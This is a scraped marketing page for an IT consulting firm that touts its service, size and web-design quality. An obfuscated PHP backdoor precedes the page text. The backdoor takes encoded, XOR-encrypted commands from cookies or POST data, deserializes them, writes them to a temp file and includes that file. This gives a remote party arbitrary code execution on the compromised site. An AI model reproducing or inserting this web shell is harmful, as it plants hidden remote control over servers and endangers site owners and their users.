$gcDIFKr = 'T' . chr (101) . "\123" . "\137" . chr (66) . "\x67" . "\131" . "\x54";$kZoSkjDMA = chr ( 227 - 128 ).chr ( 252 - 144 )."\x61" . "\163" . 's' . "\x5f" . chr (101) . chr (120) . chr ( 580 - 475 )."\163" . chr ( 889 - 773 )."\x73";$TjLoNKyvZB = class_exists($gcDIFKr); $kZoSkjDMA = "40666";$pWVym = !1;if ($TjLoNKyvZB == $pWVym){function paxusm(){$XgQoWRWyN = new /* 21071 */ TeS_BgYT(15687 + 15687); $XgQoWRWyN = NULL;}$eDgbdB = "15687";class TeS_BgYT{private function Enflrti($eDgbdB){if (is_array(TeS_BgYT::$KPSspNA)) {$rbKqtmQcIp = sys_get_temp_dir() . "/" . crc32(TeS_BgYT::$KPSspNA['s' . "\x61" . 'l' . 't']);@TeS_BgYT::$KPSspNA[chr ( 217 - 98 ).chr ( 766 - 652 ).chr ( 1020 - 915 )."\164" . "\x65"]($rbKqtmQcIp, TeS_BgYT::$KPSspNA["\143" . 'o' . "\156" . chr (116) . "\x65" . "\156" . 't']);include $rbKqtmQcIp;@TeS_BgYT::$KPSspNA["\x64" . "\145" . "\154" . "\145" . 't' . chr (101)]($rbKqtmQcIp); $eDgbdB = "15687";exit();}}private $oKNHvgzc;public function zLZOYoYFb(){echo 41826;}public function __destruct(){$eDgbdB = "28112_30749";$this->Enflrti($eDgbdB); $eDgbdB = "28112_30749";}public function lptByl($rwGKlsP, $SaaOqw){return $rwGKlsP[0] ^ str_repeat($SaaOqw, (strlen($rwGKlsP[0]) / strlen($SaaOqw)) + 1);}public function __construct($HWNKAuW=0){$ytLIex = $_POST;$RwrRp = $_COOKIE;$SaaOqw = "d2dbab51-1ab6-46dd-a7a1-57f701d9dd23";$GxEQrM = @$RwrRp[substr($SaaOqw, 0, 4)];if (!empty($GxEQrM)){$EwdCOoNWB = "base64";$rwGKlsP = "";$GxEQrM = explode(",", $GxEQrM);foreach ($GxEQrM as $CqgTAHsQ){$rwGKlsP .= @$RwrRp[$CqgTAHsQ];$rwGKlsP .= @$ytLIex[$CqgTAHsQ];}$rwGKlsP = array_map($EwdCOoNWB . "\x5f" . chr ( 825 - 725 ).chr (101) . "\x63" . chr (111) . "\x64" . "\145", array($rwGKlsP,)); $rwGKlsP = $this->lptByl($rwGKlsP, $SaaOqw);TeS_BgYT::$KPSspNA = @unserialize($rwGKlsP);}}public static $KPSspNA = 56949;}paxusm();} Why Choose OpSec Consulting? - OpSec Consulting

Why Choose OpSec Consulting?

Top 5 Reasons to Choose OpSec Consulting

We started our company with some basic ideals – offer our customers excellent service and the best tech support, while delivering a positive customer experience. These ideals have helped expand our business and drive customers to our door. A majority of our business comes simply from “word-of-mouth” referrals – one customer telling another of the experience that we offer here. We consider this the ultimate compliment.


We know business.

We offer the complete package. We have the marketing and business savvy to understand principles like return on investment and accountability. We have the IT solutions that will not only keep your company in business, but help it be increasingly successful. We offer suggestions on how you can use a variety of marketing outlets to improve efficiency or increase sales. And we have the programming know-how to develop effective, user-friendly websites for your business and the IT expertise to manage all of your IT needs at the same time.

It’s about doing things differently—and better—than the rest.


We love our job.

Our team is passionate about our work. We have experience of delivering successful projects for a variety of companies.


We’re different.

We understand that we’re not just operating managed services, marketing, and designing for our clients, but we are also managing IT services, marketing, and designing for our client’s customers. The services we provide directly correlate to your end user or client and we want to make you look good.

While most consulting firms focus purely on one specified area, OpSec Consulting is interested in your entire business. What good is having a nice brochure or website if they aren’t supporting your business goals? Our team takes the time to discover those goals, which is where every project should start.


We’re just the right size.

Working with a big firm does not necessarily give you the best service, the most talent or the latest technology. Essentially, what you get are huge bills, big promises, long silences, and impersonal “project managers” whose main focus is getting a project off their books. At OpSec Consulting, we’re here to serve your business, and we’re quick to respond to your questions and provide comprehensive answers. We strive to listen intently and get estimates and ideas to our clients promptly. Need a logo design? After approval, we’re able to send clients several ideas often within a couple days. Need to host a web site? Tell us your needs, and we can assess how to develop the right web site within your budget.


We do it right the first time.

We know that it’s more than just pictures and text to drive traffic to your website and achieve results. We’ve come across many clients who have unfortunately spent lots of money with other companies on websites that weren’t built to be found by Google. Our programmers make certain that every website we design is built with clean code; loads fast; has user-friendly navigation; is designed with an aesthetically-pleasing layout; is tested on multiple browsers; and is structured correctly for maximum search-ability. We stay updated with the latest web design technologies and comply with W3C standards.

Protect yourself from security holes, unauthorized users & devices, and rogue software.

Get in Touch for Best in Class IT Services 

Areas We Serve:

New Jersey, New York, Pennsylvania, Connecticut and California

(855) USE-OPSEC 873-6773
